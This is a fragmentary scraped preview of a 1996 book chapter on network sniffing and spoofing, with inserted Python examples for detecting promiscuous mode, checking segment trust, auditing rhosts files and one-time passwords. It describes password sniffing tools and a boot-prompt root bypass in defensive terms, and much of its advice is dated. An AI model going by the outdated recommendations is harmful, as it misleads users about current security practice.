Title: Hacking - Firewalls And Networks How To Hack Into Remote Computers
Description: Sniffing and spoofing are security threats that target the lower layers of the networking infrastructure supporting applications that use the Internet. Users do not interact directly with these lower layers and are typically completely unaware that they exist. Without a deliberate consideration of these threats, it is impossible to build effective security into the higher levels. Sniffing is a passive security attack in which a machine separate from the intended destination reads data on a network. The term “sniffing” comes from the notion of “sniffing the ether” in an Ethernet network and is a bad pun on the two meanings of the word “ether.” Passive security attacks are those that do not alter the normal flow of data on a communication link or inject data into the link.

Document Preview



Internet Security Pro Ref 557-7 dc 1-23-96

Part II: Gaining Access and Securing the Gateway

Chapter 6: IP Spoofing and Sniffing
Sniffing and spoofing are security threats that target the lower layers of the networking infrastructure supporting applications that use the Internet ...
Without a deliberate consideration of these threats, it is impossible to build effective security into the higher levels ...
The term “sniffing” comes from the notion of “sniffing the ether” in an Ethernet network and is a bad pun on the two meanings of the word “ether” ...



Spoofing is an active security attack in which one machine on the network masquerades as a different machine ...
This masquerade aims to fool other machines on the network into accepting the impostor as an original, either to lure the other machines into sending it data or to allow it to alter data ...
Such deception can have grave consequences because notions of trust are central to many networking systems ...
Sniffing gathers sufficient information to make the deception believable ...
A variety of types of machines need to have this capability ...
Another example of a device that incorporates sniffing is one typically marketed as a “network analyzer” ...
These problems can involve unusual interactions between more than just one or two machines and sometimes involve a variety of protocols interacting in strange ways ...
However, their very existence implies that a malicious person could use such a device or modify an existing machine to snoop on network traffic ...
Besides these high-level data, low-level information might be used to mount an active attack on data in another computer system ...
Each network interface has a hardware-layer address that should differ from all hardware-layer addresses of all other network interfaces on the network ...
Normally, a network interface will only respond to a data frame carrying either its own hardware-layer address in the frame’s destination field or the “broadcast address” in the destination field ...
This interrupt gets the attention of the operating system, and passes the data in the frame to the operating system for further processing ...
When the sender wants to get the attention of the operating systems of all hosts on the network, he or she uses the “broadcast address” ...
In promiscuous mode, network interfaces generate a hardware interrupt to the CPU for every frame they encounter, not just the ones with their own address or the “broadcast address” ...


At times, you may hear network administrators talk about their networking trouble spots—when they observe failures in a localized area ...
All of the packets travel through all parts of the Ethernet segment ...
Bridges, switches, and routers divide segments from each other, but low-level devices that operate on one bit at a time, such as repeaters and hubs, do not divide segments from each other ...
All frames traveling in one part of the segment also travel in the other part ...
A sniffer puts a network interface in promiscuous mode so that the sniffer can monitor each data packet on the network segment ...
With an analyzer, you can determine how much of the traffic is due to which network protocols, which hosts are the source of most of the traffic, and which hosts are the destination of most of the traffic ...
With a sufficiently powerful CPU, you can also do the analysis in real time ...
When you examine these closely, you notice that they are nothing more than a portable computer with an Ethernet card and some special software ...
It is also easy to download shareware and freeware sniffing software from the Internet or various bulletin board systems ...
However, the availability of this software also means that malicious computer users with access to a network can capture all the data flowing through the network ...
Eventually, the malicious user will run out of space to store the data—the network I use often has 1000 packets per second flowing on it ...
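As an added illustration (not from the chapter), the Python below models the destination filter described above, showing which constructed frames on a shared segment reach the operating system in normal versus promiscuous mode, and gives the check a Linux administrator can run to detect an interface left in promiscuous mode. The /sys path and the IFF_PROMISC bit are Linux facts; all addresses and frames are constructed.

```python
"""Added example (not from the book): a model of the NIC destination filter
the text describes, plus a defender's check of the Linux interface flags for
promiscuous mode. Every frame and address below is constructed."""
import struct

BROADCAST = bytes.fromhex("ffffffffffff")
IFF_PROMISC = 0x100   # Linux interface flag bit that is set in promiscuous mode


def build_frame(dst: bytes, src: bytes, ethertype: int, payload: bytes) -> bytes:
    """Assemble a minimal Ethernet II frame (no FCS) from its fields."""
    return struct.pack("!6s6sH", dst, src, ethertype) + payload


def parse_frame(frame: bytes) -> dict:
    """Split a raw Ethernet II frame into destination, source, EtherType, payload."""
    if len(frame) < 14:
        raise ValueError("frame shorter than an Ethernet header")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return {"dst": dst, "src": src, "ethertype": ethertype, "payload": frame[14:]}


def nic_accepts(frame: bytes, own_mac: bytes, promiscuous: bool) -> bool:
    """Would the interface interrupt the OS for this frame?  In normal mode only
    frames addressed to own_mac or to the broadcast address are passed up; in
    promiscuous mode every frame seen on the segment is."""
    if promiscuous:
        return True
    dst = parse_frame(frame)["dst"]
    return dst == own_mac or dst == BROADCAST


def deliver(frames, own_mac: bytes, promiscuous: bool) -> list:
    """Payloads the operating system actually sees for a list of frames."""
    return [parse_frame(f)["payload"] for f in frames
            if nic_accepts(f, own_mac, promiscuous)]


def is_promiscuous(flags_text: str) -> bool:
    """Interpret the hex string found in /sys/class/net/<iface>/flags on Linux
    (for example '0x1103'); bit 0x100 is IFF_PROMISC."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


OWN_MAC = bytes.fromhex("00a0c9112233")    # constructed: this host's interface
OTHER_MAC = bytes.fromhex("00a0c9445566")  # constructed: another host on the segment
SENDER = bytes.fromhex("080020aabbcc")     # constructed: source of all three frames

# Constructed traffic on a hub-based segment (every host's NIC sees all of it):
# a unicast frame for another host, a unicast frame for this host, an ARP broadcast.
FRAMES = [
    build_frame(OTHER_MAC, SENDER, 0x0800, b"telnet data for the other host"),
    build_frame(OWN_MAC, SENDER, 0x0800, b"data for this host"),
    build_frame(BROADCAST, SENDER, 0x0806, b"arp who-has 10.0.0.5"),
]

if __name__ == "__main__":
    print("normal mode     :", deliver(FRAMES, OWN_MAC, promiscuous=False))
    print("promiscuous mode:", deliver(FRAMES, OWN_MAC, promiscuous=True))
    # On a Linux host a defender feeds the real flags file to the same check:
    #   is_promiscuous(open("/sys/class/net/eth0/flags").read())
    print("flags 0x1103 -> promiscuous?", is_promiscuous("0x1103"))
```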



Note: Esniff ...
It is quite effective at capturing all usernames and passwords entered by users for telnet, rlogin, and FTP ...
It uses the libpcap library for portably interfacing with promiscuous mode network interfaces ... ee ... gov ...
The latest version of NetMan is available via anonymous FTP to ftp ... curtin ... au in the directory /pub/netman ... eu ... net in the directory /pub/networking/inet/ethernet/ ...
When run by an ordinary, unprivileged user, it does not put the network interface into promiscuous mode ...
Systems administrators concerned about sniffing should remove user execution privileges from this program ...
These kinds of information include the following:
- Passwords
- Financial account numbers
- Private data
- Low-level protocol information
The following subsections are intended to provide examples of these kinds ...

Typical users type a password at least once a day ...
Users usually are very careful about guarding their password by not sharing it with anyone and not writing it down anywhere ...
When the user types any of these passwords, the system does not echo them to the computer screen to ensure that no one will see them ...
End users do not realize just how easily these passwords can be found by someone using a simple and common piece of software ...
This apprehension may be partly because of the carelessness most retailers display when tearing up or returning carbons of credit card receipts ...
Although the Internet is by no means bulletproof, the most likely location for the loss of privacy to occur is at the endpoints of the transmission ...

However, much larger potential losses exist for businesses that conduct electronic funds transfer or electronic document interchange over a computer network ...

Most credit card fraud of this kind involves only a few thousand dollars per incident ...
Many e-mail messages have been publicized without the permission of the sender or receiver ...
A crucial piece of evidence was backup tapes of PROFS e-mail on a National Security Agency computer ...
It is not at all uncommon for e-mail to contain confidential business information or personal information ...



Sniffing Low-Level Protocol Information
Information network protocols send between computers includes hardware addresses of local network interfaces, the IP addresses of remote network interfaces, IP routing information, and sequence numbers assigned to bytes on a TCP connection ...
See the second part of this chapter for more information on how these data can pose risks for the security of a network ...
After an attacker has this kind of information, he or she is in a position to turn a passive attack into an active attack with even greater potential for damage ...
It was not practical to hardwire each terminal to the host, and users needed to use more than one host ...
The terminals connected to the switch so that the user had a choice of hosts ...
The switch had several thousand ports and was, in theory, capable of setting up connections between any pair of ports ...
Figure 6 ...

[Figure 6 ... : the original switch-based case study system (figure omitted). Labels: ~2500 Input, ~400 Output, IBM Mainframe, DEC Vax, [SN Switcher], Multiplexor, DEC Vax]

To make the system more flexible, the central computing facility was changed to a new system that uses a set of (DEC 550) Ethernet terminal servers with ports connected to the switch, rather than the old system, which used a fixed number of switch ports connected to each host ...



Offices have a cable running from a wallplate to a wiring closet punchdown block ...
The multiplexers serve to decrease the number of cables that need to be long ...
No two offices share any media ...

[Figure 6 ... : the case study system with terminal servers (figure omitted). Labels: Terminal Server (three), ~2500 Input, ~400 Output, IBM Mainframe, Ethernet Hub, DEC Vax, [SN Switcher], Multiplexor, DEC Vax]

Rather than using simple terminals, however, most computer users have a computer on their desktop that they use in addition to the Central Computing computers ...
The number of computer users, however, has grown rapidly over the past decade and the switch is no longer adequate ...

To phase out the switch, Central Computing installed an Ethernet hub in the basement of each building next to the punchdown block used to support both the switch multiplexer and the telephone lines ...
Hubs also were placed in the wiring closets on each floor of each building that connected to the basement hub ...
The new wiring scheme neatly parallels the old and was changed relatively inexpensively ...
3 illustrates the system after the networking of user areas ...
4 shows the user area networking detail ...
3 Case study system after networking of user areas ...
4 Case study user area networking detail ...
From a logical standpoint, it can get to the same places, but the data can and does go to many other places as well ...
Different departments are located in the same building ...
Ordinary staff, the managers that supervise them, and middle management all are located in the same building ...

In addition to nosiness and competition, a variety of people sharing the same physical media in the new wiring scheme could easily misuse the network ...
Any sensitive information that they transmit is no longer limited to a direct path between the user’s machine and the final destination; anyone in the building can intercept the information with a sniffer ...

The network in the case study fails miserably in the prevention of sniffing ...
The following section describes how to design a network that limits the sharing of media to prevent sniffing by untrustworthy machines ...


Network Segmentation
A network segment consists of a set of machines that share low-level devices and wiring and see the same set of data on their network interfaces ...
An ordinary hub is essentially a multiport repeater; all the wires attached to it are part of the same segment ...
The wires on opposite sides of a bridge are not part of the same segment because the bridge filters out some of the packets flowing through it ...
Some packets flow through the bridge, but not all ...
Any device on one side of the bridge can still send packets to any device on the other side of the bridge ...
Just as bridges can be used to set up boundaries between segments, so can switches ...
Because they limit the flow of all data, a careful introduction of bridges and switches can be used to limit the flow of sensitive information and prevent sniffing on untrustworthy machines ...
They enhance performance by reducing the collision rate of segments, which is much higher without these components ...
As one is planning the network infrastructure, one should keep these other factors in mind as well ...



A segment is a subset of machines on the same subnet ...
Hence, they also form borders between segments in a network ...
Machines on different subnets are always part of different segments ...
Dividing a network into subnets with routers is a more radical solution to the sniffing problem than dividing subnets into segments ...

Segmentation of a network is the primary tool one has in fighting sniffing ...
This ideal can be accomplished by using switches instead of hubs to connect to individual machines in a 10BASE-T network ...
Such solutions all involve the notion of trust between machines ...


Understanding Trust
Typically, one thinks of trust at the application layer between file servers and clients ...
However, this notion of trust extends to lower-level network devices as well ...
Hosts are trusting of routers and routers are trusted machines ...
A machine sending data considered private on a particular network segment must trust all machines on that network segment ...

The threat of sniffing comes from someone installing sniffing software on a machine normally on the network, someone taking a sniffer into a room and jacking it into the network connections available there, or even installing an unauthorized network connection to sniff ...


Hardware Barriers
To create trustworthy segments, you must set up barriers between secure segments and insecure segments ...
An example of such a segment would be a segment that does not extend outside the machine room of a computing facility ...
The personal trust between staff members is mirrored by the mutual trust between the systems for which they are responsible ...
Insecure segments need not be trusted if those segments carry only public or non-critical data ...
No guarantee of absolute security is made for the information stored ...

It is less clear where to draw the line in a more professional business setting ...
Even if a person can be trusted personally in an ethical sense, he or she may not be trustworthy technically to administer a machine in such a way that an attacker could not abuse the machine under his or her control ...
5 (an arrow points from the trusting machine to the trusted machine) ...
One such partitioning is shown in figure 6 ...



Figure 6 ... 5 that satisfies the lack of trust between machines ...
How secure you make a segment is related to how much control you take away from the technically untrustworthy end user who uses the network in a location with limited physical security ...
However, to actually remove control from the end user and prevent the end user machine from being used for sniffing, the machine on the end user’s desk essentially becomes a terminal ...

If the end user cannot be trusted or if the software on a desktop machine could be altered by the authorized end user because of the machine’s physical location, then the machine should not be a personal computer ...
1, or Windows 95 ...
Hence, any user can run a sniffer on such a system ...
No system administrator can restrict what the end user can and cannot do with one of these machines ...
Essentially, they become terminals that offload some of the work from the central, physically secure server ...
These operating systems only allow access to certain hardware level operations to superusers ...
It is still possible to bring alternative boot media to most workstation-class operating systems and obtain superuser privileges without knowing the superuser password ...
Usually the only software that can be installed by the user is the operating system ...
The system administrator in charge of the local network had designated the workstations secure enough to be trusted by the file server to NFS mount a file system containing mission-critical data directories ...
After a self-test, it came up with a boot monitor prompt ...
As it turned out, one command (auto) would boot the workstation directly into Unix multiuser mode, which is what the system administrator had always done ...
When I tried the alternative command (boot), the workstation booted directly into Unix single-user mode and gave the person at the keyboard superuser privileges without being required to issue a password ...
The documentation supplied with the workstations did not mention it ...
Password protection made these workstations sufficiently secure to be trusted to mount the mission-critical disks ...
On other systems, the password may be circumvented with other methods ...
By obtaining superuser privileges, a user could not only sniff data, but do much more serious damage ...
In these cases, a secure segment is probably out of the question unless the end users are impeccably ethical and technically competent to maintain system security on the machines they control (a machine administered by someone without security training is likely to be broken into by an attacker and used as a base of operations to attack other machines, including sniffing attacks) ...
That is, while any of the machines on the segment could be used as a sniffer, the users trust that they will not be, based on the following:
- The physical security of the machines
- The technical competence of the other users to prevent outsiders from gaining control of one of the machines remotely
- The personal integrity of the other users
It is possible to build a secure subnet or local area network out of a set of segments that each have mutually trusting machines ...
Machines that need to communicate across segment boundaries should only do so with data that is not private ...
Such an arrangement presumes that the end users trust the staff operating these central facilities ...


Connecting Segments of One-Way Trust
Consider, for example, the simple situation of two segments of mutual trust ...
However, the machines in the first segment are communicating less sensitive information than those in the second segment ...
In this case, it is allowable for the data from the first segment to flow through the second segment ...

One-way trust is fairly common between secure segments and other types of segments ...
Similarly, one-way trust may exist between a segment of mutual trust and an insecure segment ...
Tree diagrams represent hierarchies graphically ...

Thus, the more secure segments are closer to the root of the tree and less secure segments are closer to the leaves—insecure segments are leaves in the tree representing the one-way trust hierarchy ...
The reason for this is that such a setup isn’t safe from sniffing ...

However, most users expect a higher level of security than any such setup could provide ...
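The one-way trust tree described above, worked through as an added example (not from the chapter): segments are arranged with the most secure segment at the root, each segment trusts its ancestors, and a proposed data path for private data is accepted only if every segment it crosses is one the source segment trusts. The segment names and the tree are constructed, loosely following the chapter's case study.

```python
"""Added example (not from the book): checking data paths against a one-way
trust hierarchy.  Segments form a tree whose root is the most secure segment.
A segment trusts its ancestors, so private data may flow *through* any
segment at least as trusted as its source, but never through a less trusted
one.  The tree below is constructed, loosely following the chapter's case study."""

# child -> parent (the parent is the more trusted segment); None marks the root.
TRUST_TREE = {
    "machine_room": None,
    "cs_management": "machine_room",
    "cs_staff": "cs_management",
    "math_management": "machine_room",
    "math_staff": "math_management",
    "cs_clients": "machine_room",      # insecure leaf: public data only
}


def ancestors(tree, segment):
    """Segments that `segment` trusts: itself and everything toward the root."""
    chain, node = [], segment
    while node is not None:
        if node not in tree:
            raise KeyError(f"unknown segment {node!r}")
        chain.append(node)
        node = tree[node]
    return chain


def trusts(tree, trusting, trusted):
    """One-way trust: `trusting` trusts `trusted` iff trusted lies on its path to the root."""
    return trusted in ancestors(tree, trusting)


def unsafe_hops(tree, source, path):
    """Segments on `path` the source does not trust (empty when the path is safe)."""
    return [seg for seg in path if not trusts(tree, source, seg)]


def path_is_safe(tree, source, path):
    """True if private data from `source` may traverse every segment on `path`."""
    return not unsafe_hops(tree, source, path)


def route(tree, src, dst):
    """Path through the tree from src to dst: up to the common ancestor, then down."""
    up, down = ancestors(tree, src), ancestors(tree, dst)
    common = next(seg for seg in up if seg in down)
    return up[:up.index(common) + 1] + list(reversed(down[:down.index(common)]))


def check_flow(tree, src, dst):
    """Route src -> dst and report whether private data may take that path."""
    path = route(tree, src, dst)
    return {"path": path, "safe": path_is_safe(tree, src, path),
            "unsafe_hops": unsafe_hops(tree, src, path)}


if __name__ == "__main__":
    # Staff traffic may climb through its management suite to the machine room ...
    print(check_flow(TRUST_TREE, "math_staff", "machine_room"))
    # ... but management data must not be carried down through the staff segment,
    # and data from one department's staff crosses segments the other does not trust.
    print(check_flow(TRUST_TREE, "math_management", "math_staff"))
    print(check_flow(TRUST_TREE, "cs_staff", "math_staff"))
```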


Case Study: A Small Department Subnet
A good case study of a network system at risk is in a building at the university where I work ...
On the lower floor are several rooms with computers that are accessible by clients of Computer Science, offices for professional staff members in each of the three departments, and the Computer Science machine room ...

The rooms in which clients access the network are not secure ...
They are not mutually trusting of all members of other departments ...
They cannot trust the professional staff they supervise because they work with sensitive employee records dealing with performance reviews, salary recommendations, and compete for resources provided by higher levels of management ...
These suites may be considered secure relative to the offices of the staff they supervise ...

Finally, the Computer Science machine room is secure ...
7 Trust relationships between groups of machines in case study ...
The Mathematics management suite must be placed on a separate segment ...
In an exact parallel, the Computer Science management suite can have a segment with data flowing through it to and from the Computer Science staff segment ...
Notice the fact that we have a hierarchy of trust in effect here ...

Now consider the wiring system available to service these two floors ...

The upper floor has a primary communication closet immediately above it connected by a conduit through the flooring ...
The primary closet connects, via a wiring conduit, to a secondary communication closet on the opposite side of the upper floor close to the Computer Science management suite ...
The minimum cost solution is simply to locate a set of hubs in each communications closet and connect all the hubs together to form a single segment ...
If cost is not an issue, each of the proposed segments can simply be connected by a switch ...
8 shows such a solution ...
The Mathematics management suite has a segment that bears the burden of traffic from the staff segment ...

Computer Science has five separate segments joined by a switch ...
Computer Science, Mathematics, and English each have a separate subnet ...

The solution shown in figure 6 ...
Absolute security is not provided since it is still possible for anyone to hook up a sniffer on any of the segments ...
The areas where more security is needed have higher levels of physical security as well ...
Also, except on the insecure Computer Science client segment, there is trust between the authorized users of the machines sharing a segment ...


[Figure 6 ... : the proposed segmentation (figure omitted). A router and a switch join separate hubs for Computer Science Management, Computer Science Staff, Computer Science Machine Room, Computer Science Clients, English Staff, and Math Staff]
You can learn several things from looking at the case study and its solution:
- A minimum cost solution is not likely to provide for security ...
- Different approaches to cost and performance trade-offs may be combined in a secure system ...
- A single solution may provide both security and enhance performance as in the solution shown for Computer Science ...
There is almost no cost difference between having a single segment for Mathematics and the solution shown ...



Tip: A simple hardware barrier that is inexpensive and has the potential for increasing network performance is the installation of a bridge between your machine room and the rest of your facility ...
A bridge placed between the machine room and the rest of the facility prevents this traffic from escaping to less secure areas and reduces the collision rate outside the machine room ...
In fact, a low-cost personal computer may be configured for this purpose with free software such as Drawbridge ...
Drawbridge is also capable of filtering operations and can act as a cheap alternative to a firewall in small networks ...

So far, this section has covered how to avoid sniffing of data from the local part of the Internet ...
However, many security breaches are aided either knowingly or unknowingly by internal personnel ...
Not only is physical security greater for the more trusted segments, but so is the technical competence of those in charge of the computer systems ...
Systems that can accept commands from remote locations must be administered by those technically competent enough to prevent remote intruders by not making mistakes that will allow remote intruders to gain access to the systems ...
When building medieval fortresses, the last line of defense was typically the most formidable but could only protect those who would be left inside after the outer defenses had been breached ...
The local hardware defenses may limit intrusion into the local systems ...
One extreme that preserves security is simply not to permit access from remote locations ...
Legitimate Internet sessions initiated inside a network with those outside must also be protected ...
The best way to deal with this problem is simply not to transmit cleartext passwords across the network ...
Several different methods are in use to provide this kind of protection:
- The rlogin family of protocols
- Using encrypted passwords
- Zero knowledge authentication

The rlogin Family of Protocols
The rlogin protocol, originally used with Unix-to-Unix terminal sessions, uses end-to-end mutual trust to avoid the transmission of any form of password ...
The user places a file on the server indicating what combinations of username and hostname may connect to a particular account on machines using the server ...

This file is called the rhosts file ...
rhosts,” but on non-Unix systems using this protocol, the file may have to have a different name to satisfy the constraints imposed for filenames or different mechanisms used to store the information about what users are accepted on what trusted systems ...
The requirement that the rhosts file not be altered is obvious—if someone modified the rhosts file, he or she could connect to the account via the rlogin protocol without the permission of the legitimate user ...
If an attacker gains access to another account on the machine hosting the rlogin server, the attacker can read the rhosts file of a user and target the user for an indirect attack ...

Another file used by some servers for the rlogin protocol is called the host equivalence file, which is named “/etc/hosts ...
Any user of any host listed in the host equivalence file may access an account with the same username on the machine on which the host equivalence file exists without presenting a password ...
However, it opens up users to the risks of ARP spoofing and name server spoofing (both covered later in this chapter) without the implicit consent they give to that risk when creating their own rhosts file ...
Users without the network savvy to create an rhosts file are being put at risk from a threat they have no possibility of understanding ...
The family is collectively referred to as the r-commands ...
rcp is preferred over FTP for its security and ease of use ...

The rlogin protocol remains vulnerable to ARP spoofing and DNS spoofing (discussed later in this chapter) ...
For example, when you start an rlogin terminal session from a client’s or colleague’s office, the client’s or colleague’s machine is not listed in your rhosts ...


Note: The r-commands are not limited to Unix ...
Many TCP/IP software packages for the PC offer r-command clients ...
There are many freeware packages that provide a similar server for any PC with winsock ...


Problems with rlogin
As mentioned earlier, on a machine with any server for programs in the rlogin protocol family it is critical that only the user can modify his or her rhosts file ...
Note that if your home directory is on an NFS mounted file system exported to someone else’s machine, your rhosts file is vulnerable to simple attacks on NFS ...
The NFS server is fooled into believing you are accessing your files because it trusts the other machine to authenticate its users ...

If an attacker is able to modify the superuser rlogin file or gain access to any account listed in it, such access can be leveraged into a very serious attack ...
Unlike rlogin or telnet, rsh does not require a pseudo-tty ...
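An added example (not part of the chapter) of the check a system administrator would want here: an audit of a user's rhosts file for wildcard entries and for the ownership and permission problems the text describes. File content, uid values and the trusted-host list are constructed; the "host [user]" line format and the "+" wildcard follow the classic BSD rhosts syntax.

```python
"""Added example (not from the book): auditing a user's rhosts file for the
weaknesses the chapter describes: entries that let anyone connect, and a file
that someone other than its owner can modify or read.  The file content and
ownership data below are constructed; a real audit would obtain them with
open() and os.stat().  Line format 'host [user]' and the '+' wildcard follow
the classic BSD rhosts syntax."""
import stat


def parse_rhosts(text):
    """Return (host, user) pairs; a missing user field means 'the same username'."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # tolerate comments, though not standard
        if not line:
            continue
        fields = line.split()
        entries.append((fields[0], fields[1] if len(fields) > 1 else None))
    return entries


def audit_entries(entries, trusted_hosts):
    """(severity, message) findings for the parsed entries."""
    findings = []
    for host, user in entries:
        if host == "+" and user == "+":
            findings.append(("critical", "'+ +' lets any user on any host log in without a password"))
        elif host == "+":
            findings.append(("critical", f"'+' trusts every host for user {user or '<same name>'}"))
        elif user == "+":
            findings.append(("high", f"host {host} may log in as this account from any username"))
        elif host.startswith("+@"):
            findings.append(("medium", f"netgroup {host[2:]} is trusted; its membership comes from NIS"))
        elif host.startswith("-"):
            continue                      # a negative entry removes trust; nothing to flag
        elif host not in trusted_hosts:
            findings.append(("medium", f"host {host} is not on the trusted-host list"))
    return findings


def audit_permissions(owner_uid, expected_uid, mode):
    """The chapter's requirement: only the user may modify his or her rhosts file."""
    findings = []
    if owner_uid != expected_uid:
        findings.append(("critical", f"file owned by uid {owner_uid}, expected {expected_uid}"))
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("critical", "file is writable by group or others"))
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(("low", "file is readable by other accounts (exposes the trust list)"))
    return findings


def audit_rhosts(text, owner_uid, expected_uid, mode, trusted_hosts):
    """Full audit: ownership/permission findings first, then per-entry findings."""
    return (audit_permissions(owner_uid, expected_uid, mode)
            + audit_entries(parse_rhosts(text), trusted_hosts))


# Constructed sample file: one sensible entry, one wildcard, one unknown host.
SAMPLE_RHOSTS = """\
workstation1.example.test
+ +
labhost.example.test  guest
"""
TRUSTED = {"workstation1.example.test", "server.example.test"}

if __name__ == "__main__":
    # mode 0o644 is common but weak: every account on the host can read the file
    for sev, msg in audit_rhosts(SAMPLE_RHOSTS, owner_uid=1001, expected_uid=1001,
                                 mode=0o644, trusted_hosts=TRUSTED):
        print(f"[{sev}] {msg}")
```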



Do not confuse the rexec commands (rexec and rcmd) with the r-commands ...
It will then execute a single shell command ...
Also, it provides two distinct error conditions, one for an invalid username and one for an invalid password ...
A standard login program will not provide this distinction and will provide a mechanism to prevent rapid-fire attempts to log in ...


Using Encrypted Passwords
Another solution is to use encrypted passwords over the network ...
Even with encryption, a sniffer can still record the encrypted password and decipher the encrypted password at his or her leisure ...
If the sender and receiver are closely synchronized, the sniffer must replay the encrypted password within one tick of the two machines’ shared clock ...
One way around this lack of close synchronization is to set a limited number of attempts at typing the password correctly ...
The attacker would decrypt it for repeated use at a later time ...
This encryption technique is no longer considered particularly secure against brute force cryptographic attacks where all likely passwords are encrypted with the same algorithm used by the password file ...
Hence, poorly chosen (for example, dictionary words) or short passwords are particularly easy to crack by brute force ...
In public key cryptography (also called asymmetric cryptography), you use separate keys for encryption and decryption—the decryption key is not computable from the encryption key ...

The server then decrypts the password to verify the authenticity of the user ...
It also allows the server to use a time-dependent public key to prevent password replay or brute force decryption of a relatively short password ...

It uses Secure RPC (Remote Procedure Call) authentication ...
Secure RPC uses public key cryptography using the patented Diffie-Hellman algorithm ...

SRA can be obtained by anonymous ftp to coast ... purdue ...


The use of Kerberos also prevents cleartext passwords from being sent across the network ...
This avoids having servers trust clients to do the authentication, as the rlogin protocol must do ...


Zero-Knowledge Authentication
Another mechanism for secure authentication without passwords is zero-knowledge proofs ...
When the client connects to the server, the server queries the client about a set of digits in a small set of positions in the sequence ...
The server will query for a different set of positions each time the client connects ...
You store the digit sequence held by the client on a credit card sized device or even in a ring worn by the user ...

RFC 1704 and RFC 1750 provide a good background in the principles of authentication and the current state of encryption technology for the Internet ...
3 uses a challenge / response technique in conjunction with DES encryption for authentication ... uu ...

S/KEY from Bellcore uses the response / challenge technique as well ... bellcore ...
S/Key has support for a variety of platforms, including Unix, Macintosh, and Windows, to generate the one-time password used as a response to a challenge ...

RFC 1760 describes the system in technical detail ...
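A worked version of the challenge/response one-time-password scheme just described, added here as an example (not from the chapter and not Bellcore's S/KEY code): it follows the OTP format of RFC 2289, the successor of S/KEY, using that RFC's MD5 variant rather than the MD4 of RFC 1760, and shows why a response recorded by a sniffer cannot be replayed. Passphrase and seed are constructed.

```python
"""Added example (not from the book): a one-time-password hash chain in the
style of S/KEY (RFC 1760) and its successor OTP (RFC 2289), using the MD5
variant of RFC 2289 (S/KEY proper uses MD4).  The server stores only the
*next* link of the chain, never the passphrase, so a response captured by a
sniffer is useless once the server has advanced.  Seed and passphrase below
are constructed."""
import hashlib


def fold(digest16: bytes) -> bytes:
    """RFC 2289 MD5 fold: XOR the two 8-byte halves of the 16-byte digest."""
    return bytes(a ^ b for a, b in zip(digest16[:8], digest16[8:]))


def step(value: bytes) -> bytes:
    """One link of the chain: hash the 8-byte value and fold back to 8 bytes."""
    return fold(hashlib.md5(value).digest())


def otp(passphrase: str, seed: str, n: int) -> bytes:
    """The n-th one-time password: the initial value hashed n times."""
    value = fold(hashlib.md5((seed.lower() + passphrase).encode()).digest())
    for _ in range(n):
        value = step(value)
    return value


class OtpServer:
    """Holds (sequence number, last accepted OTP); the passphrase never leaves the client."""

    def __init__(self, passphrase: str, seed: str, count: int = 100):
        # Initialisation happens once, offline or over a secure channel.
        self.seed, self.sequence = seed, count
        self.stored = otp(passphrase, seed, count)

    def challenge(self) -> str:
        """The challenge sent to the client: 'otp-md5 <sequence-1> <seed>'."""
        return f"otp-md5 {self.sequence - 1} {self.seed}"

    def verify(self, response: bytes) -> bool:
        """Accept iff hashing the response once gives the stored link; then advance."""
        if self.sequence <= 1:
            return False                     # chain exhausted; must re-initialise
        if step(response) != self.stored:
            return False                     # wrong passphrase, or a replayed response
        self.sequence -= 1
        self.stored = response               # the accepted value is the next link
        return True


def client_response(passphrase: str, challenge: str) -> bytes:
    """Client side: compute the OTP the challenge asks for from the passphrase."""
    _, seq, seed = challenge.split()
    return otp(passphrase, seed, int(seq))


def demo():
    """Login once, then replay the same sniffed response: (first, replay, sequence)."""
    server = OtpServer("correct horse battery", "ex12345", count=5)
    resp = client_response("correct horse battery", server.challenge())
    first = server.verify(resp)
    replay = server.verify(resp)             # same bytes a sniffer would have captured
    return first, replay, server.sequence


if __name__ == "__main__":
    print(demo())                            # (True, False, 4)
```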
Public key cryptography is sometimes called asymmetric because different keys are used for encryption and decryption with no practical way to compute one key from the other key ...
Just as public key cryptography can be used to authenticate a user, it can also be used to solve the key distribution problem of a symmetric encryption technique ...
Thus, the key cannot be sniffed and used to decrypt the rest of the session ...
Because the entire contents of a TCP connection are encrypted, you can send credit card numbers over the Internet without worrying that someone will intercept them at one of the many routers between the user’s Web browser and the merchant’s Web site ...

To take advantage of session encryption on the Web, you must have compatible encryption techniques being used on both the browser and the Web server ...
Any vendor doing business on the Web should be quite clear about what encryption techniques the server supports and give a list of some of the browsers that support it so that a user will know in advance if the information being sent is protected by encryption ...


Spoofing
Spoofing can occur at all layers of the IP system. All application layer protocols are at risk if the lower layers have been compromised. This includes routing protocols and the DNS naming protocol.


Hardware Address Spoofing
At the hardware layer, any network interface for a shared-media network will have a hardware interface address.

p1vPHCP/nhb1

Internet Security Pro Ref 577-7 Gina 1-27-96 CH06 LP#3

279

280

Part II: Gaining Access and Securing the Gateway

A much more serious problem occurs if the network interface can alter the source address and send data that appears to come from various source addresses. It uses this hardware address to match the variety of destination addresses of the frames it sees. Packets coming from the operating system to the interface do not typically specify a source address; the interface always puts its hardware address in the source field. When another host examines a packet containing a hardware source address associated with an interface of a particular machine, it assumes that the packet originated on that machine and accepts it as authentic. Regardless, many interface cards are configurable and allow host software to specify a source address other than the one assigned by the manufacturer.

DECNet, for example, uses 16-bit identifiers and requires that the leading 32 bits of the hardware address be set to a fixed value to indicate that the packet is a DECNet packet.

To see how common it is for a network interface to be able to spoof the source address, however, recall how a bridge works. A PC with two software configurable interfaces can be configured to be used as a bridge. The drawbridge software mentioned in the previous section on hardware barriers to prevent sniffing is compatible with most Ethernet boards, which means most Ethernet boards will permit source address spoofing. Unfortunately, there is very little you can do to protect yourself against such deviousness. Unfortunately, currently there are no protections in the IP network layer that will prevent a hardware address spoofer from disguising one machine as another. Fortunately, hardware address spoofing is difficult (relative to many other spoofing methods) and requires penetration of physical security. You need to trace the wiring to be certain no one has connected an unauthorized machine and you also need to check to see if the authorized machines are using the hardware address they should.

All machines not in physically secure locations can be connected to hubs in secure locations. Thus, you can configure the hub to accept only packets with hardware addresses matching the manufacturer-assigned hardware address of the interface on the authorized machine. Clearly, you are still relying on physical security to be sure that the hub, wires, and authorized machine remain as they should. However, they are marketed as “active hubs” or “filtering hubs.”


ARP Spoofing
